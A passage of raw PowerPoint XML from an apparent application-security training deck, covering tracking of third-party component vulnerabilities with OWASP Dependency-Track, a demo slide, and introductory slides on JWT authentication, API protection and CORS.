            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      &lt;/execution&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;/executions&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;/plugin&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;/plugins&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Objet 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309936654"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2195736" y="3507854"/>
          <a:ext cx="1607245" cy="417516"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s2104" name="Objet d’environnement du Gestionnaire de liaisons" showAsIcon="1" r:id="rId9" imgW="2640240" imgH="685800" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Objet d’environnement du Gestionnaire de liaisons" showAsIcon="1" r:id="rId9" imgW="2640240" imgH="685800" progId="Package">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId10"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="2195736" y="3507854"/>
                        <a:ext cx="1607245" cy="417516"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147749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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="937840"/>
            <a:ext cx="8352928" cy="3506118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Tracking project vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Dependency-Track</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Continuous Component Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Platform, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>source, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>OWASP, for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>CI/CD process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Features : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CycloneDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SPDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>bill-of-material </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Dependency-Check XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Jenkins and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>gitlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>-ci </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>integration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Deployed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>in Kazan !</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6840760"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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3rd party components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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995686"/>
            <a:ext cx="3981252" cy="2149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4461135" y="4227934"/>
            <a:ext cx="4215321" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://kazan.atosworldline.com/dependency-track</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4031530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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="937840"/>
            <a:ext cx="8208912" cy="3506118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Kazan </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Dependency-Track </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> As a Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6840760"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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3rd party components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18770075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51670"/>
            <a:ext cx="8208912" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authentication by JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4075876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496" y="771550"/>
            <a:ext cx="9145016" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– third-party-components</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/PW-Third-Party-Components.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14494301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1851670"/>
            <a:ext cx="6696744" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>API Protection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cross Origin Resource Sharing (CORS)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14454708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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API Protection</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07504" y="915566"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>verview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10+ new topic (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>draft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> version)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>REST API architecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>growing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> (mobile, SPA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>,…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Restrict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> to API for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>authorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>area impacts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>others</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>potential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Broken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
